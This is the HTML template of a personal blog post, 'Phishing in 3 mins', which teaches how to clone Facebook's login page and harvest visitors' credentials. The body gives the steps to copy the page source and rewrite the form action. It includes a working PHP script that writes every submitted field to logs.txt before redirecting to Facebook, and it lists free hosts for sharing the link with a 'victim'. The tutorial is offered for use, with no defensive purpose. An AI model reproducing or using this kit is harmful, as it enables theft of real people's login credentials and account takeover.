<!DOCTYPE html>
<html lang="en">

  <head>

    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">
    <link href="https://fonts.googleapis.com/css?family=Raleway:100,300,400,500,700,900" rel="stylesheet">

    <title>Mohit Khyalia</title>

    <!-- Additional CSS Files -->
    <link rel="stylesheet" type="text/css" href="{{url_for('static',filename='css/bootstrap.min.css')}}">

    <link rel="stylesheet" type="text/css" href="{{url_for('static',filename='css/font-awesome.css')}}">

    <link rel="stylesheet" href="{{url_for('static',filename='css/templatemo-softy-pinko.css')}}">

    </head>
    <style media="screen">
    .mobile-container {
max-width: 480px;
margin: auto;
background-color: #555;
height: 500px;
color: white;
border-radius: 10px;
}

.topnav {
overflow: hidden;
background-color: white;
position: relative;
}

.topnav #myLinks {
display: none;
}

.topnav a {
color: black;
padding: 14px 16px;
text-decoration: none;
font-size: 17px;
display: block;
}

.img-kali{
  weidth:100%;
  height: 4%;



}

.min-box{
  background-color: white;
  padding-left: 3%;
  padding-top: 2%;
  padding-right: 3%;
  padding-bottom: 2%;
  border-radius: 1%;
}

.topnav a.icon {
background: black;
display: block;
position: absolute;
right: 0;
top: 0;
}

.topnav a:hover {
background-color: #ddd;
color: black;
}


    </style>

    <body>

    <!-- ***** Preloader Start *****
    <div id="preloader">
        <div class="jumper">
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
     -***** Preloader End ***** -->


    <!-- ***** Header Area Start ***** -->
    <header class="header-area header-sticky">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <nav class="main-nav">
                        <!-- ***** Logo Start *****-->
                        <a href="/" class="logo">

                            Mohit Khyalia
                        </a>
                         <!--***** Logo End ***** -->
                        <!-- ***** Menu Start ***** -->
                        <ul class="nav">
                            <li><a href="/" >Home</a></li>

                            <li><a href="/blog">Blogs</a></li>




                        </ul>

                        <a href="javascript:void(0);" onclick="myFunction()"  class='icon menu-trigger'>
                            <span>Menu</span>
                        </a>
                        <div class="topnav">
                        <div id="myLinks">
                          <a href="/" >Home</a>

                          <a href="/blog">Blogs</a>

                        </div>
                      </div>
                         <!--***** Menu End ***** -->
                    </nav>
                </div>
            </div>
        </div>
    </header>
    <!-- ***** Header Area End ***** -->
    <section class="mini" id="work-process">
        <div class="mini-content">
            <div class="container">
                <div class="row">
                    <div class="offset-lg-3 col-lg-6">
                        <div class="info" style="margin-top:15%;">
                            <h1>Phishing</h1>
                            <p></p>
                        </div>
                    </div>
                </div>

                <!-- ***** Mini Box Start ***** -->
                <div class=" min-box" style="padding-left:2%;">
                  <h4>Phishing in 3 mins</h4>
                  <br>
                  <br>
                  <p>
                    There is video tutorial <a href="#video-phi-tu">Click me </a>for video tutorial.
                  </p>
                  <br>
                  <p>
                    Here is the list of things that you will learn from this post.
                  </p>
                  <br>
                  <p>
                    <li>  How to copy the code from the original website</li>
                      <li>  How to do some changes in this code</li>
                        <li>  How to make a php script</li>
                          <li>  How to upload it to the Hosting</li>

                  </p>
                  <br>
                  <p>
                    Open a website of which Phishing page do you want then press ctrl+U to open its source code file. For ex:- I’m copying the code of Facebook.com and then I will make a facebook phishing page. Well, this is what which you want …Right!! 😛
                  </p>
                  <br>
                  <p>
                    So I’m copying the source code from Fcaebook.com by pressing ctrl+U. You can see here the source code from Facebook.com.
                  </p>
                  <br>
                  <p>
                    The only thing you have to do is to select all code and then copy this code by pressing ctrl+A and then ctrl+C and then open a notepad file and paste it there by pressing ctrl+V.
                  </p>
                  <br>
                  <p>
                    You can see here I pasted down the whole code from website to my notepad file.
                  </p>
                  <br>
                  <p>
                    Now, you have to find this line  <strong>"action=”https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110″ method=”post”</strong>  by pressing ctrl+F and type this whole line there and press Enter.And replace it
                    with your login file for eg: <strong>"action=”login.php″ method=”get”</strong> and also change method to get.
                  </p>
                  <br>
                  <p>
                    And now we need a php file which will save the values given for username and pwd.
                  </p>
                  <br>
                  <p>
                    Just past this php code and name it as login.php or <a download="login.php" href="{{url_for('static',filename='login.php')}}"> download</a>
                    <br>
                    "<?php <br>
                    header(“Location: https://www.facebook.com”);<br>
                    $handle = fopen(“logs.txt”, “a”);<br>
                    foreach($_GET as $variable => $value) {<br>
                      fwrite($handle, $variable);<br>



                      fwrite($handle, “=”);<br>
                      fwrite($handle, $value);<br><br><br>
                      fwrite($handle, “\r\n”);<br><br>
                    }<br>
                    fwrite($handle, “\r\n”);<br>
                    fclose($handle);<br>
                    exit;<br>
                    ?>"
                  </p>
                  <br>

                  One more thing creates a blank notepad file with a logs.txt name on which victim’s usernames and password will save.
                  <br>
                  <p>
                    Now, you have three notepad files one is none.html and second is login.php and third is logs.txt. Just copy all files and save it to a new folder.
                  </p>
                  <br>
                  <p>
                    Now how can you host and share the link to the victim,so here are some free web-hosting websites.
                  </p>
                  <br>
                  <p>
                    <a href="https://byet.host/">byet</a>
                    <br>
                    <a href="https://www.000webhost.com/">000webhost</a>
                    <br>
                    <a href="https://www.freehostia.com/">freehostia</a>
                    <br>
                    <a href="https://www.5gbfree.com/">5gbfree</a>
                  </p>
                  <br>
                  <p>
                    You can use any of them to register a domain for free. Now, come to the hosting. You can use any of the websites. Now, the post is becoming so long so, I will upload Its second part in which I will show you how to attach domain and hosting and also tell some tricks which nobody tells you. 🙂 So, do subscribe to the new post. Good Bye 🙂
                  </p>
                  <br>
                  <p>
                    <strong>And checkout video tutorial</strong>
                  </p>
                  <br>
                  <br>
                  <br>
                  <div class="vido" style="padding-left:3%;" id="video-phi-tu">
                    <iframe width="98%" height="7%" src="https://www.youtube-nocookie.com/embed/BnTqZarjCuU" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
                  </div>
                  <br>
                  <br>
                  <br>
              </div>
                <!-- ***** Mini Box End ***** -->
            </div>
        </div>
    </section>
    <!-- ***** Welcome Area Start ***** -->




    <section class="section colored" id="contact-us">
        <div class="container">
           <!--***** Section Title Start ***** -->
            <div class="row">
                <div class="col-lg-12">

                </div>
                <div class="offset-lg-3 col-lg-6">
                    <div class="center-text">
                      <li> <a href="https://www.instagram.com/mohitkhyalia_mk/" style="margin-left:4%;"><i class="fa fa-instagram"></i></a></li>
                      <p class="copyright">© 2013–2021 · Made with ❤️ in India</p>
                    </div>
                </div>
            </div>
            <!-- ***** Section Title End ***** -->

            <div class="row">
                <!-- ***** Contact Text Start ***** -->

                <!-- ***** Contact Text End ***** -->

                <!-- ***** Contact Form Start ***** -->

                <!-- ***** Contact Form End ***** -->
            </div>


            <div class="">
              <div class="" style="width: 69%;margin-left:13%;margin-top:6%;margin-bottom:6%;">

              </div >


              <img class='logo-mk' src="{{url_for('static',filename='images/logo.jpg')}}" style="width: 69%;margin-left:13%;margin-top:6%;" alt="Mohit Khyalia"/>
            </div>

        </div>
    </section>
    <!-- ***** Contact Us End ***** -->

    <!-- ***** Footer Start ***** -->



    <!-- jQuery -->
    <script src="{{url_for('static',filename='js/jquery-2.1.0.min.js')}}"></script>
    <script>
    /* Toggle between showing and hiding the navigation menu links when the user clicks on the hamburger menu / bar icon */
      function myFunction() {

          var x = document.getElementById("myLinks");
          if (x.style.display === "block") {
            x.style.display = "none";
          } else {
            x.style.display = "block";
          }
        }

    </script>

    <!-- Bootstrap -->
    <script src="{{url_for('static',filename='js/popper.js')}}"></script>
    <script src="{{url_for('static',filename='js/bootstrap.min.js')}}"></script>

    <!-- Plugins -->
    <script src="{{url_for('static',filename='js/scrollreveal.min.js')}}"></script>
    <script src="{{url_for('static',filename='js/waypoints.min.js')}}"></script>
    <script src="{{url_for('static',filename='js/jquery.counterup.min.js')}}"></script>
    <script src="{{url_for('static',filename='js/imgfix.min.js')}}"></script>

    <!-- Global Init -->
    <script src="cjs/custom.js')}}"></script>

  </body>
</html>
